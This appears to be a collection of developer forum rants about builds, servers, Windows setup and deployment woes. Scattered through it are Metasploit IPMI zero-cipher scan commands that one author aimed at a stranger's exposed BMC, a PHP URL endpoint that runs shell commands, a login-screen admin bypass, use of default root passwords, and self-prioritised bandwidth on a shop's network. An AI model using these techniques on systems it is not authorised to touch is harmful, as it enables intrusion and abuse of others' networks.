Lo and behold, everyone's at my service now. I get all things clarified; it takes around an hour and a half of my time (could have been done in 20 minutes had someone given me the complete info) to find out all I need to know and remove all the compilation problems.
Hurrah. In my frustration, I forgot to push some changes, and because of some weird shit in our build framework, the build failed in Jenkins. Multiple times. Even though the exact same code was working on my local setup (cliche, I know).
In any case, it was sometime during sorting out this mess that I came to know the reason why the 2nd motherfucker accepted the 3-day deadline: the total bill being slapped on the customer is four fucking million USD.
Greed. Wow. The fucker just sacrificed everyone's day and night (his team's and the next's) for 4mil. And my manager and director agreed. Four fucking million dollars. I don't get to see a penny of it. I work for peanut shells, for 15 hours a day; he'll get bonuses and commissions; the fucking junior dev earns more than me; but my manager says I'm the MVP of the team, and all I get is a thanks and a bad rating for this hike cycle.
4mil USD, I learnt today, is enough to make you lick the smelly, hairy balls of a Neanderthal even though the money isn't truly yours.
-
Two things before this all:
- I fucking love gitlab so far
- I miss the fuzzy searching from Sublime Text, as VS Code still can't do it properly...
I was fed up with all the shitty overbloated git deployment scripts, sync scripts, automatic backup solutions and hosted git servers out there, so now my own solution is:
- local files are git clones from the remote
- local files are synced via Dropbox, to easily edit them on any device
- all changes and deleted files are kept for up to 1 year on Dropbox
- the remote has GitLab running and webhooks set up
- the webhooks point to my node scripts, which then rebase the code onto its dedicated dev server (see the sketch after this list)
- daily server backups with a 7-day roll
- cold storage backup every 30 days
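The deploy step behind those webhooks boils down to something like this per project; a sketch with invented paths - the actual node handler (not shown) just validates the X-Gitlab-Token header and shells out:

    #!/usr/bin/env bash
    # deploy.sh <project> - called by the webhook handler after token validation
    set -euo pipefail
    cd "/srv/dev/$1"
    git fetch origin
    git rebase origin/master   # rebase fresh changes onto the dev server copy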
Sounds like overkill, but from my experience, you really can't have enough places holding a backup, especially cold storage backups.
My goal in general, though, is to have everything on my computer backed up and ready to go ASAP if something happens.
I wanted to just use a virtual machine for development stuff, but that wouldn't be able to run on my laptop, so I need a more general solution where I sync all configs and all projects across (and have some sort of basic list of the tools needed, so I don't need to remember them).
Found, for example, something for VS Code to sync its settings and plugins via any sort of git; will give it a try in the near future too.
-
My client is using some legacy server-side software. I set it all up nice and isolated with Proxmox, tunneled it through Cloudflare, got the folks to do their install on a Windows VM, passed through their licensing USB. Hosted GLPI on it too (system inventory), and so on.
Wait for it. Windows Server refuses to accept local or domain passwords. WTF. I even went ahead and did a Utilman reset, which gets you an admin cmd prompt at the login screen where you can reset the password. Insane that it was even possible, but no good.
The client blamed Linux for it, so I switched over to Windows Server on bare metal. I set up Hyper-V, thinking it should be just as capable as KVM.
Nope.
Guess what: you can't pass through USB for licensing (the legacy software). The MOFOS DECIDED TO install it on bare metal. I couldn't even get Hyper-V to create a decent virtual network; it keeps changing all my network adapter settings. I COULDN'T EVEN PASS THROUGH PCIE NETWORK CARDS.
This feels like an eternally stagnated, mossy soup of abandonware.
FUCK YOU WINDOWS. You've been a sore pain in the ass for EVERYONE.
-
Got to know about OSMC/Kodi last week. Took out my Raspberry Pi, set up OSMC over the weekend, did all the cable setup for 4 external hard drives and connected it to the TV via HDMI. After a few configurations, I'm all set up. I'm astonished by all the features it provides: fetching data from TMDb (I had actually created a JavaFX app to do this for my local library just last month), remote control from Android as well as the web browser. Enabled UPnP, and now I have my complete media center floating around my house network. It is one of the best open source projects I have laid my eyes upon. Wish I could attach more pics.
-
Best thing about doing Wi-Fi setup/network maintenance for the local coffee shop for free? Putting my laptop's MAC address into the QoS table and guaranteeing myself bandwidth.
-
Remember to always set up and test your production setup!
Seems like a local college forgot to do some QA 😂
-
Some Project Manager outsourced a redundant RADIUS setup with a MySQL backend. We got 2 copies of a daloRADIUS appliance running on Ubuntu 10.04. Once I saw this, I started to get a bit suspicious and requested to audit the system and database redundancy. With the system in production, and without getting back any documentation, I got into the VMs using the default root password. This was not even the worst part, as I found: one server was using a local MySQL instance, while the other was also using the first one's MySQL instance. When I reported this, I was told to clearly comment any changes to the configuration files, which resulted in commenting the word SHAME above each change.
-
I technically joined just after this guy left (fired), but the stories are too good not to tell!
The guy was clearly off, but it wasn't his fault; he must have had Asperger's.
He would insist on writing with two pens in one hand; he said it was faster and the only way he could write neatly... (Nope)
I don't think that was too weird, but he would also put on death metal at full volume. Because he couldn't hear anyone, the team used to make paper planes and fire them at him when they wanted his attention.
Another thing: he was into furry... stuff, but was super open about it. Had wolves and shit like that on his desk and always wore a wolf shirt.
But he was fired, he wasn't great at his job.
I came in to help sort out the mess: it was the government's setup for servers and nurses' and doctors' computers for the NHS over in England.
He effectively skull fucked the entire system.
He magically (to this day I cannot understand how) forced updates and upgraded to a newer version of Windows Server; the problem being that the programs wouldn't work on the newer Windows at the time.
Most machines were on XP at the time, and they used Windows servers back then.
Luckily it wasn't nationwide, just in my local area, but still thousands of computers were affected.
The issue became this... You see, they had this program on their computers that let them get patient documents, update them, etc.
He removed or added code that made it update all the laptops and desktops to a new service pack, which they didn't want... Then he upgraded the servers to a new Windows version; I don't remember the specifics.
But the updates and the new version of Windows made it so the laptops etc. couldn't communicate with the servers.
... The next day he got fired and I was brought in for a few weeks to help sort out the mess.
But apparently he was a super interesting guy but with way to many quirks.
It costs the tax payers a fortune! Literally a few million to sort his mistake out people were working round the clock for two weeks straight.3 -
I HATE SURFACES SO FRICKING MUCH. OK, sure, they're decent when they work. But the problem is that half the time our Surfaces here DON'T work. From not connecting to the network, to only one external screen working when docked, to shutting down due to overheating because Microsoft didn't put fans in them, to the battery getting too hot and bulging... So. Many. Problems.
It finally culminated this past weekend when I had to set up a Laptop 3. It already had a local AD profile set up, so I needed to reset it and let it autoprovision. Should be easy - generally a half-hour or so job. I perform the reset, and it begins reinstalling Windows. Halfway through, it BSODs with a NO_BOOT_MEDIA error. Great, now it's stuck in a boot loop. Tried several things to fix it. Nothing worked. Oh well, I may as well just do a clean install of Windows.
I plug a flash drive into my PC, download the Media Creation Tool, and try to create an image. It goes through the lengthy process of downloading Windows, then begins creating the media. At 68% it just errors out with no explanation. Hmm. Strange. I try again. Same issue. Well, it's 5:15 on a Friday evening; I'm not staying at work. But the user needs this laptop Monday morning. Fine, I'll take it home and work on it over the weekend.
At home, I use my personal PC to create a bootable USB drive. No hitches this time. I plug it into the laptop and boot from it. However, once I hit the Windows installation screen, the keyboard stops working. The trackpad doesn't work. The touchscreen doesn't work. Weird - none of the other Surfaces had this issue. Fine, I'll use an external keyboard. Except Microsoft is brilliant and only put one USB-A port on the machine. BRILLIANT. Fortunately I have a USB hub, so I plug that in. Now I can use a USB keyboard to proceed through the Windows installation. However, when I get to the network connection stage, no wireless networks come up. At this point I'm beginning to realize that the drivers which work fine when navigating the UEFI somehow don't work during Windows installation. Oh well. I proceed through setup and then install the drivers. But of course the machine hasn't autoprovisioned, because it had no internet connection during setup. OK fine, I decide to reset it again. Surely that BSOD was just a fluke. Nope. Happens again.
I again proceed through Windows installation and install the drivers. I decide to try a fresh installation *without* resetting, thinking maybe whatever bug is causing the BSOD is also deleting the drivers. No dice. OK, I go Googling. Turns out this is a common issue: the Laptop 3 uses wonky drivers, and the generic Windows installation drivers won't work right. This is ridiculous. Windows is made by Microsoft. Surface is made by Microsoft. And I'm supposed to believe that I can't even install Windows on the machine properly?
Oh well, I'll try it. Apparently I need to extract the Laptop 3 drivers, convert the ESD install file to a WIM file, inject the drivers, then split the WIM file, since it's now too big to fit on a FAT32 drive. I honestly didn't even expect this to work, but it did. I ran into quite a few more problems with autoprovisioning which required two more reinstallations, but I won't go into detail on that. All in all, I totaled up 9 hours on that laptop over the weekend. Suffice to say our organization is now looking very hard at DELL for our next machines.
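For anyone stuck in the same hole, the ESD-to-WIM, driver-inject and split dance is all DISM; roughly these steps, written from memory, so treat the paths and index number as assumptions:

    rem convert install.esd into an editable WIM
    dism /Export-Image /SourceImageFile:D:\sources\install.esd /SourceIndex:1 /DestinationImageFile:C:\work\install.wim /Compress:max

    rem mount it and inject the extracted Surface drivers
    dism /Mount-Wim /WimFile:C:\work\install.wim /Index:1 /MountDir:C:\mount
    dism /Image:C:\mount /Add-Driver /Driver:C:\SurfaceDrivers /Recurse
    dism /Unmount-Wim /MountDir:C:\mount /Commit

    rem split so it fits on FAT32 (chunks under 4GB)
    dism /Split-Image /ImageFile:C:\work\install.wim /SWMFile:D:\sources\install.swm /FileSize:3800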
-
I've been a solo frontend developer for a couple of weeks now, with enormous, critical features and some bugs to get out the door by the end of next week.
On top of that, I got a backend bug to fix, which is fine since I know the stack. The SQL that's causing the bug is an obvious fix, but as a FE dev I have no damn idea about the DB structure.
I decided to set up a local DB to see it for myself. So, as a reasonable developer, I looked for docs to set it up, since it sounds like quite a process after confirming with colleagues.
ANNNND... SURPRISE, the docs ARE NON-EXISTENT, unless you wanna call an outdated diagram a sufficient doc. Just so you understand the pain: we have 9 microservices, a weird DB structure, and only 5% of it is documented.
I requested help from my colleagues, but their answers were about as useful as the docs, with a follow-up of "maybe you can document it after you set this up". Barely stopped myself from asking "do I look like I have time for this crap? Why don't YOU document it, SINCE YOUR SETUP IS READY TO GO?"
So I've been at it for a couple of hours and I gave up. Will go back to frontend development, since there's still a ton of shit to do anyway. Tomorrow I will attempt this again.
-
So... My boss is "hard working", meaning that she'd rather edit and upload an HTML file every morning at 5am, as she has for the last 5 years, and manually send a push notification telling the users that the new file is up, than learn a little bit about automation (cron? IFTTT?). Even after letting her know about those options, she has "no time".
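For context, that entire 5am ritual is one crontab line plus whatever push API they use; a sketch - every path and script name here is invented:

    # m h dom mon dow  command
    0 5 * * * /home/boss/bin/build_page.sh && rsync -a /home/boss/out/index.html web:/var/www/html/ && /home/boss/bin/send_push.sh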
She'd rather keep the source code (Pug, Sass), manually build on her local computer and upload to the live servers, instead of learning git and letting me set up CI/CD once and for all.
SERIOUSLY!?!? NO TIME!?!? But there's time to do things at a turtle's pace like in the 90s... 🤦‍♂️
-
TL;DR: When picking vendors to outsource work to, vet them really well.
Backstory:
Got a large redesign project that involves rebuilding a website's main navigation (accessibility reasons).
Project is too big for just our dev team to handle on top of our workload, so we get to bring in a 3rd party vendor to help us. We do this often, so no big deal.
But this time the twist was that Senior Management already had retained hours with a dev shop, so they want us to use them for the project. Okay...
It begins:
Have our scope / discovery meeting about the changes and our expected DevOps workflow.
Devs work local and push changes to our GitHub; that kicks off the build and we test on Dev, then it goes to Staging for more testing & PM review. Once ready, we can push to prod, or whenever needed. All was agreed, everyone was happy.
Emailed the vendor's project manager to ask for their devs' GitHub accounts so we could add them to the project. Got no reply for 3 days.
4th day, I get back: "Who sets up the GitHub accounts?"
fuck me. they've never used GitHub before, but in our scope meeting 4 days ago you said GitHub was fine...??
Whatever, fuck it. I'll make the accounts and add them.
Added 4 devs to the repo and set up a new branch. 40min later I get an email that they can't set up the dev environment now; the dev doesn't know how to set up our CMS locally, "not working for some reason."
So, they ask for permission to develop on our STAGING server... "because it's already set up"... they want to actively dev on our staging, where we get PM/Senior Management approvals?
We have dev, staging, production instances and you want to dev in staging, not dev?... nay nay good sir.
This is whom senior management wants us to use, already paid for via retainer no less. They are a major dev shop and they're useless...
😢😭
Can't wait for today's progress checkup meeting. 😐😐
/rant
-
!rant
Just finished my first game jam officially. It was fun, and our game, though not working 100%, was well done. We had art people and a sound guy, who btw made some amazing music for the game. A couple of us plan to keep working on the game after the jam (because we have time), and since it's more of a local jam, our deadline for submission is extended until a week after the jam finishes. (Game broke after merge issues :D)
Glad I decided to go and try it out.
Hah, but my issue was that most of my time was spent getting Unity and a git GUI of some sort to work on Linux Mint; by halfway through Saturday I had it, lol. Also not much for me to do, since we had a total of six programmers.
So if I don't get a new laptop before the next game jam, my setup is ready to go, which is awesome.
-
Firefox Developer Edition fucked up my development this morning after the update -_-
The fucking "Enhanced Tracking Protection" was on for a local Wi-Fi IP address (192.168...), which automatically redirected to the HTTPS version of that IP; but I had set up Kestrel to listen on HTTP, which resulted in a nice "Cannot establish a secure connection (and suck it up, because ¯\_(ツ)_/¯)".
Fortunately it's easy to get rid of this cunt: just click the shield next to the address and disable that motherfucker.
ps: sorry for the lil rage, my morning-train-trip development brain cells should not be bothered by these automatic technical troubles
Further question to the Firefox developers:
WHAT THE FUCK were you thinking when you forced developers into automatic HTTPS redirection, when you should know better than anyone that development is 360deg (and not 90, like your mom)
-
A newly joined developer (who was supposed to be very senior) comes and asks me how to write a test, cos for some reason the person didn't know how to mock.
In Java
(the same goes for any other implementation which has an interface),
writes ArrayList<String> list = new ArrayList<>();
instead of programming to the interface: List<String> list = new ArrayList<>();
Deployed code (another engineer from another country helped to deploy, since this new senior dev didn't have access yet).
But the new senior dev didn't update the relevant files in the production code, which brought down the site for nearly an hour. Mistake aside, the first reaction from this new senior dev was 'WHY DIDN'T THE DEV WHO WAS HELPING DO THE FILE UPDATE?'
This was followed by some other complaints, such as our branching strategies being wrong. When in fact the new senior dev had made a mistake by just making assumptions about our git branching strategies, and we had already advised on the correct process.
Out of all these, guess this is the best part. The senior dev never tested code locally! Just wrote code and a unit test and sent it to QA, and somehow the tests passed. I learnt this when I realised this dev... had not even set up the local environment yet.
I keep saying new, but this senior dev has been around for like 3 months! This person is in another team within our larger team but shares the same code base. I am puzzled how you can go without setting up your environment for 3 months. Don't you ask for help if you are stuck? I am pretty sure the env is still not set up.
Am I overreacting, or is this one disgusting developer who doesn't even qualify as an intern, let alone a senior dev? It's so revolting I can't even bring myself to offer help.
-
So one of my employees pointed his local setup at the live database to test some weird behavior in an algorithm. Then he started the next task and wiped his database to reload the fixtures. After that he realized that he still had the live database credentials in his configuration file.
-
!Rant #lazy
I set up my local server so I can test my apps, and mounted my partitions in my www folder, in a folder named "mnt" with numbered folders for each mounted partition.
So I can access and download my files to my phone and other devices from all over the network :)
And even watch movies that are on my computer, on my phone or TV.
And when I want to sleep I usually watch a movie, or one episode of a series stored on my PC, on my phone in my bed 😅
So the thing is, I'm too lazy to get out of bed and shut down the server and the PC.
So I set up this file so I can run commands on my PC from my phone 😅😂😂😂
192.168.1.110/server.php?cmd=shutdown now&psw=mypassword
-
I work for an investment wank. Worked for a few. The classic setup - it's like something out of a museum, and they HATE engineers. You are only of value if work on the trade floor close to the money.
They treat software engineering like it's data entry. For the local roles they demand x number of years experience, but almost all roles are outsourced, and they take literally ANYONE the agency offers. Most of them can't even write a for loop. They don't know what recursion is.
If you put in a tech test, the agency cries to a PMO, who calls you a bully, and hires the clueless intern. An intern or two is great, if they have passion, but you don't want a whole department staffed by interns, especially ones who make clear they only took this job for the money. Literally takes 100 people to change a lightbulb. More meetings and bullshit than development.
The Head of Engineering worked with Cobol, can't write code, has no idea what anyone does, hates Agile, hates JIRA. Clueless, bitter, insecure dinosaur. In no position to know who to hire or what developers should be doing. Randomly deletes tickets and epics from JIRA out of spite, then screams about deadlines.
Testing is the same in all 3 environments: Dev, SIT, and UAT. They literally have deployment instructions they run in all 3; that is their "testing". The Head of Engineering doesn't believe test automation is possible.
They literally don't have architects. Literally no form of technical leadership whatsoever. Just screaming PMOs and lots of intern devs.
The PMO, full of BAs, refuses to use JIRA. Doesn't think it's its job to talk to the clients. Does nothing, really, except demand 2-hour phone calls every day, which ALL developers and testers must attend to get shouted at. No screenshare. Just pure chaos. No system. Not Agile. Not Waterfall. Just spam the shit out of you, literally 2,000 emails a day, then scream if one task was missed.
Developers, PMO, everyone spends ALL day in Zoom. Zoom call after call. Almost no code is ever written, and whatever code is written is awful. No design patterns. Hardcoded to death. Then when a new feature comes in that should take a day, it takes these unskilled devs 6 months, with the PMO screaming like a banshee, demanding literally 12-hour days and weekends.
Everything is on spreadsheets. Every JIRA ticket is copy-pasted into Excel and emailed around, though Excel can do this by itself.
The DevOps team doesn't know how to use Jenkins or GitHub.
You are not allowed to use a NoSQL database because it is high risk. -
RAAAAAAH fuck fuck fucking shit!!! Fuck jest, TypeScript "on the fly" compilation, esModuleInterop, typeRoots, missing definitions, jest ts-ignore and xtest everywhere, manual npm linking with different pkg mgrs & publishing to a private registry, building docker images locally and doing tag management across git, docker & kubernetes, then crossing fingers that prod (which has 0 common setup with local & test) somehow works, opening architecture "tickets" and waiting months before they resolve, then repeating ad infinitum. How the fuck can I be productive when I need to be all over the place all the time and deal with these meta-code shenanigans? I just wanna code, dammit
-
It's 5:32 am. I've been working on a new social media website, opened up devRant to check what's up, and found out people really have amazing PC setups ♥️ I couldn't post mine because my laptop has a broken keyboard (I use a USB keyboard) and it overheats, so I stuck skateboard wheels under two of the back supports. It's an i5 processor with 3 GB of RAM, but I love it; it's what you do with your resources that really matters, right? With that broken keyboard I created a website for my college department, which 720 students and teachers now use, and we got around 8k entries in 3 days. I'm running the website on a local server at my college, so no money spent on hosting. Taking small steps towards my goals, and hopefully one day I'll publish my setup.
-
I have a defective Supermicro server, but the IPMI is working and could tell me what's going on.
Only problem is, I don't have access to it, since the previous owner didn't provide the credentials.
So I thought, let's try Metasploit.
I set up a local network with a second server and connected to the local* address.
"Welcome to the Intel integrated BMC web console"
What? It's a Supermicro, did the owner reflash the IPMI? What the heck.
Msf: scan address ....
ipmi found bla bla bla.
Msf: zero cipher scan.
... Vulnerable to zero cipher.
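For anyone retracing this, that shorthand maps onto real Metasploit modules; paths from memory, so double-check them locally:

msf > use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 192.168.1.0/24
msf auxiliary(ipmi_version) > run
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.0/24
msf auxiliary(ipmi_cipher_zero) > run

with RHOSTS standing in for whatever range the BMC sits on.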
I was pretty happy, but the doubt kept creeping in.
On my workstation, which isn't connected to my server's IPMI, I go to that IP address.
Bam
"Welcome to intel BMC ......"
MOTHERFUCKER.
What are the odds that some fucker has his IPMI open to the public on the exact same address my board was configured to?
Well, actually pretty high I guess.
Fuck. Shit.
That didn't go as planned. -
!rant from a support guy
I was tasked with migrating an Exchange 2003 server (yes, those are still used) for an upcoming Office 365 deployment. There is no direct upgrade path from one to the other, as far as we know.
My task was to export PSTs from the mailboxes. Great, a native tool exists for that in 2003 (exmerge). But only for mailboxes under 2 GB, because ANSI/Unicode! Half of our mailboxes bust that limit. Oh, it seems Exchange 2007 has a PowerShell command for exporting to PST as well! But pre-SP3, that command relies on a local installation of Outlook on the server (DAFUQ), and it has been superseded by another "standalone" PowerShell command. So I install a bogus Windows 2012 server only for that purpose, with the Exchange Management Tools (which, by the way, are bundled with the Exchange installation setup and REQUIRE IIS to be installed on the target machine. Also, if you install ONLY the Exchange 2007 Management Tools and wish to uninstall them afterwards, you can't, because the uninstaller wants you to select an Exchange Role to remove, and they are all unchecked in my tools-only setup). Never worked, and Google-fu says that the newer New-MailboxExportRequest command seems to have dropped Exchange 2003 support.
So I'm back to installing a pre-SP3 Exchange 2007. Then the older Export-Mailbox PowerShell command whines about 64-bit and 32-bit incompatibility; actually, I ***HAVE*** to have the whole OS/software stack 32-bit ONLY. Don't ask me why!
Some article I found says I could fire up an XP virtual machine for that; I go for Win 7 x86. "Sorry, Microsoft Exchange won't be installed on a workstation environment because reasons." All right then, let's go for an old Windows Server 2003 x86. Have you ever tried to boot that up in a Hyper-V environment, where mouse and keyboard support for Windows Server 2003 is apparently optional? No keyboard OR mouse events sent to the guest machine at all.
* Sigh *, let's use a Windows Server 2008, but WATCH OUT! Microsoft discontinued x86 support with the W2008 R2 release, so non-R2 for me. Even then, mouse events weren't sent until I installed the guest additions.
In the end, Export-Mailbox did work, but it cost me two days of banging my head against the wall. (Oh, and I was taking internal calls in between as well...)
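For anyone stuck on the same migration, the working invocation was something along these lines; parameter names from memory, so check Get-Help Export-Mailbox before trusting it:

Export-Mailbox -Identity "some.user@domain.local" -PSTFolderPath "C:\PST" -Confirm:$false

run per mailbox, or fed from Get-Mailbox for the lot.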
And that's why I aspire to be a programmer. Thank you for nothing, Microsoft! -
What's your workspace setup?
Curious because it took a while and a lot of experimenting/thinking to get mine set up the way it is, but now I can't even think properly unless things are set up that way after booting up in the morning.
Here goes:
Workspace 1: general stuff, personal email, social media, random research for non-work-related things, etc.
Workspace 2: my main project, local development; includes terminals, database, browser research for bugs, debugging software, error logs, etc.
Workspace 3: my main project, production; consoles, browser, etc. related to the production server, you get the idea.
Workspace 4: local dev on my side project
I found it crucial to separate workspaces 2 and 3; it has helped me avoid countless stupid errors, like accidentally working in a production terminal and wanting to rip my hair out wondering why the fuck _____ isn't working, then realizing: oh shit, I'm on production, not local. Huge brainspace bandwidth saver when set up like this.
How about you? -
No actual data loss here, but the feeling of data loss.
After having my data scattered across several devices, I decided to get a grip on it and use a cloud. I'm too paranoid for a real cloud, so I went with a local Nextcloud installation. That was done via Docker, with a 2 TB RAID1 array.
I noticed that after restarting the server, the cloud was somehow reset and pointed me to the setup page; afterwards, my files were already there. It did strike me as odd, but I figured "maybe just don't restart the server for the time being".
But I did restart it. And this time I had to set up the cloud again, and my files were gone. I came close to a heart attack, even though all those files weren't that valuable. I ripped one disk out of the USB hub, connected it to my laptop and tried to mount it, but no luck: RAID array. Instead I started photorec and recovered a bunch of files, even though their names were random hex and I knew I'd spend the next weeks sorting my files. While photorec ran, I inspected the Docker container and saw that there were only 10 GB of space available. After a while, and one final df, I found the culprit: the RAID. For some reason the RAID wasn't mounted at boot, so Docker had created the volumes on the server's hard disk, and the same goes for the container data. After re-adding the disk to the hub, I mounted the RAID and inspected everything again. All my files were still there.
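The usual fix for that failure mode, as a suggestion rather than something from the post: tell systemd that Docker must not start before the RAID is mounted, e.g. a drop-in at /etc/systemd/system/docker.service.d/wait-for-raid.conf:

[Unit]
RequiresMountsFor=/mnt/raid

with /mnt/raid standing in for wherever the array is mounted, plus a matching fstab entry so the mount actually happens at boot.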
At no point did I lose my data, but the thought was shocking enough. It'd be best not to fiddle with this server for a while. -
Today I charted new realms for myself.
I created a new Hyper-V VM on the company Windows servers, adding a 5th instance, but instead of running another Windows Server I installed Ubuntu 18.04 (because I'm a bit familiar with Debian from my Raspberry Pi).
We have two servers: one runs the 4 VMs, the other is a replica. I first had the new VM on the main server, but it occurred to me to move it to the unused replica machine instead. That kinda worked... I did a planned failover, but the main server isn't configured to be the replica... and even when activating that, it didn't work. This is weird.
For the moment I ignored that and proceeded to install nginx, MariaDB and PHP 7.2... basically the LEMP stack. I managed to set up nginx and a static IP address for the machine (which was different from how I remembered doing it: in 18.04 it's not done with the network conf but with a YAML file).
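That YAML file is netplan; for reference, a static address in 18.04 looks roughly like the sketch below, with made-up values, applied via sudo netplan apply:

# /etc/netplan/01-static.yaml
network:
  version: 2
  ethernets:
    eth0:
      addresses: [192.168.1.50/24]
      gateway4: 192.168.1.1
      nameservers:
        addresses: [192.168.1.1]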
In the end I added two different virtual servers: one for actual use and one for dev stuff (with phpMyAdmin running, for instance), listening on port 80 and some random other port.
As a test I brought up a MediaWiki on the port 80 server, and it worked.
On Monday I have to figure out how to implement the wildcard certificate I have for our company domain (internal DNS simply routes intranet.company.com to the local server VM).
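The nginx side of a wildcard cert is mercifully short; a sketch with assumed file paths:

server {
    listen 443 ssl;
    server_name intranet.company.com;
    ssl_certificate     /etc/ssl/certs/wildcard.company.com.crt;
    ssl_certificate_key /etc/ssl/private/wildcard.company.com.key;
    # existing root/location config stays as-is
}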
I am mighty proud, because all my Linux experience so far was with a Raspberry Pi, and I'm fairly certain I did it right and without shortcuts this time (unlike my Raspberry experience).
Just wanted to share.
(I also sweated a lot of blood when editing the Hyper-V settings, as I did not set up the server in the first place.)
((I also installed xrdp and a MATE desktop; I am less proud of that, but sometimes seeing folders graphically helps me.))
I got a new computer. I ended up getting a Sager laptop, and I also ended up with Windows 10 Pro. I had forgotten how shitty Windows 10 has gotten. My biggest gripes are the start button (fixed using Open-Shell) and creating and adding users. Microshit goes out of their way to trick you into getting a POS MS account. I knew the trick when my PC first started: stay offline so MS cannot force an MS account. However, I added a user later, and again they fuck with you to force an MS account. I figured out which non-descript place to click to just add a local account. This is shitty behavior for an OS, especially one that claims to be Pro. It's not how you win customers; it just aggravates people who know what they are doing.
The bright side is that I could take out my frustration after I moved my Fallout 4 setup to the new computer. Mod Organizer 2 makes it easy to move everything at once. Configured one config file and boom, I can now run it on Ultra settings. Exploded a few skulls and reduced a few more to radioactive ash/goo. Frustrations are gone. lol
Also on the bright side of running Pro: I can control updates via group policy. This doesn't seem to work on Home. -
!rant
...
.UseKestrel(options =>
{
    // bind to the machine's LAN address and port 5000;
    // IPAddress.Parse("192.168.178.20") would be the tidier equivalent
    options.Listen(new IPAddress(new byte[] { 192, 168, 178, 20 }), 5000);
})
...
Look at this easy piece of code (that I added) from an ASP.NET Core 2 template project (MVC). I only needed to add it to WebHost.CreateDefaultBuilder() (in Program.cs) to set up a working web server that listens and answers on that IP (the local network machine's IP) and port. Then I opened that port on my modem for this local IP, used dynamic DNS via noip.com, tested it from my smartphone over a 4G connection, and it works!
This is the EASIEST web project setup and test that I've ever tried and that let me showcase something from my machine to the entire world! :')
Great job, Microsoft; can't wait to try the cross-platform side of this open standard.
Fuuuuuuuck!!
CR estimates:
Part 1: 2h including testing
Part 2: 2h, to 2 days, to maybe never (small changes on a horrifically fucked-up project no one understands, with tons of tech debt)
Managed to pull off part two in one day.. //yay me?!
An additional day to un-fuck-up git fuckups (including, but not limited to, the master head not compiling because a smartass included *.cs in the .gitignore file, which he also pushed.. don't ask, I have no clue why..), which was a huuuge deal for me, as I usually use only the local repo and had no idea how to tackle this.. a coworker helped out.. seems I was on the right track, but git push branchy was acting up & said I had to log in & ofc I had no clue what the pass was set to (first setup was more than 2 yrs ago).. so new key, new pass.. all good.. yay!
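For the record, the .gitignore part of the cleanup boils down to something like this (commands reconstructed for illustration, not copied from history):

# drop the offending rule, then re-add the sources it was hiding
sed -i '/^\*\.cs$/d' .gitignore
git add --all
git commit -m "stop ignoring *.cs, restore missing sources"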
Back to the original story/rant: now I'm stuck writing the Jira explanation of why it was done this way & not the way the customer suggested. They only offered a vague description anyway, one which would have required me to do a hacky, messy thing, ew.. + it most probably would have required major data modifications after deployment to even make it work..
Anyhow, this explanation would also be easy peasy in English..
BUT...
I must write it in my native tongue.. o.O FML! Spent almost 40 mins on one paragraph..
Sooo.. if anyone starts a petition to ban non-English in IT, I'm all for it!! -
So I'm looking for a tutorial on managing auth with React.
I have passport-local set up with JWT in Express, but I'm looking to manage users on the front end: managing user state app-wide, logging out, protected routes, etc.
I've done some searching around, but I can't find anything too concrete. Any pointers or articles would be great.
I was thinking of localStorage, but I'm not sure how to go about setting that up with React.
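In case it helps, the localStorage part is only a few lines; a minimal TypeScript sketch with all names invented, plus the usual caveat that localStorage is readable by any script running on the page:

const TOKEN_KEY = "jwt";

export function saveToken(token: string): void {
  localStorage.setItem(TOKEN_KEY, token);
}

export function getToken(): string | null {
  return localStorage.getItem(TOKEN_KEY);
}

export function logout(): void {
  localStorage.removeItem(TOKEN_KEY);
}

// attach the token to API calls; "Bearer <token>" assumes the
// passport-jwt default extractor on the Express side
export async function apiFetch(url: string, init: RequestInit = {}): Promise<Response> {
  const token = getToken();
  const headers = new Headers(init.headers);
  if (token) headers.set("Authorization", `Bearer ${token}`);
  return fetch(url, { ...init, headers });
}

From there, app-wide user state is usually a React context wrapping getToken(), and a protected route is just a component that redirects when the token is null.
-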
I just realised I have 1TB of MS OneDrive Cloud space lying around unused. DAMNNN!!!
Just yesterday, I was thinking of backing up all my content to the cloud (just in case, and because of past experiences of losing data).
I did a quick fact check and figured out that I have ~450 GB of un-backed-up data.
After some quick calculations, I arrived at the number of Google accounts I'd need at 15 GB of Drive space per account.
Today, I was playing around with my Microsoft Developer account and saw OneDrive. I thought, let's check how much free space the MS Dev subscription offers.
It showed 1024 GB. FUCK! My balls dropped.
Now here's what I did...
I have a local drive of 500 GB, which holds all the un-backed-up data. I set up my local OneDrive folder there and put everything into OneDrive.
And then, I moved my local Google Drive into OneDrive. A nested setup for important stuff.
So this way, less important stuff is backed up on cloud and accessible everywhere.
And more important stuff gets synced on Google Drive and OneDrive, both.
Did I do the right and sensible thing with this kind of setup?
The MS Developer subscription says it expires in 90 days, but up to today they have always auto-renewed it.
I still have ~500 GB of space which can be consumed.
Also, overall, the MS ecosystem seems much better to me than Google's. Moreover, MS allows custom domain mapping, which Google doesn't.
Let's see how I can migrate entirely to the MS ecosystem in the near future. -
Alright, here we go again with issues on Vector (my home server, which we're transitioning our website, infiniit.co, to).
I'm trying to get the email server up and running. It's a PITA, which is evident from the fact that we're now on attempt number 6, or at least on the 6th VM. Right now I'm installing a Ubuntu 16.04 LTS ISO, and I'll be installing iRedMail unless someone has other recommendations. So far I've had nothing but problems doing it manually: installing Dovecot and Postfix, trying to get them linked, and the latest failure was sending a test email locally.
Also, continuing the last issue I had here: now my VMRC isn't working anymore for some reason. I've forwarded websockets, but it won't work unless I use the local IP, since everything (except direct local-IP connections) runs through an Apache VHost setup... My head hurts. Help pls. -
Anyone running Symfony in a Docker container in production? I'm currently trying to migrate our dev env to a docker-compose setup (from a "monolith" Vagrant VM). I'm actually not stuck on a Symfony-specific thing, but on, I guess, a Docker-specific one(?). The issue is that I need two users to read and write to one folder (in my case the /application/var/cache folder). Since I mount the whole codebase into the Docker container (to use an IDE on the local files), I've got a volume (not mounted to the outside world) for that folder. (So far, so good.) Now this folder is owned by root, and root is also the user I get when I enter the container. When I run a CLI script that writes to this folder, everything works (as it's run by root), and the resulting entries in the cache dir are owned by root. Trouble starts when the php-fpm process, which runs as www-data, tries to write there too.
If I add `USER www-data` (or create a new user foobar and add `USER foobar`), the container exits with status 0.
So I guess the question is: is anyone running a Symfony app on Docker in prod, and if so, how do you solve this? Or, what is the best practice for this? Sure, on dev I could just `chmod 777` the whole folder or run the php-fpm process as root, but if that thing ever goes to prod, I wouldn't sleep very well...
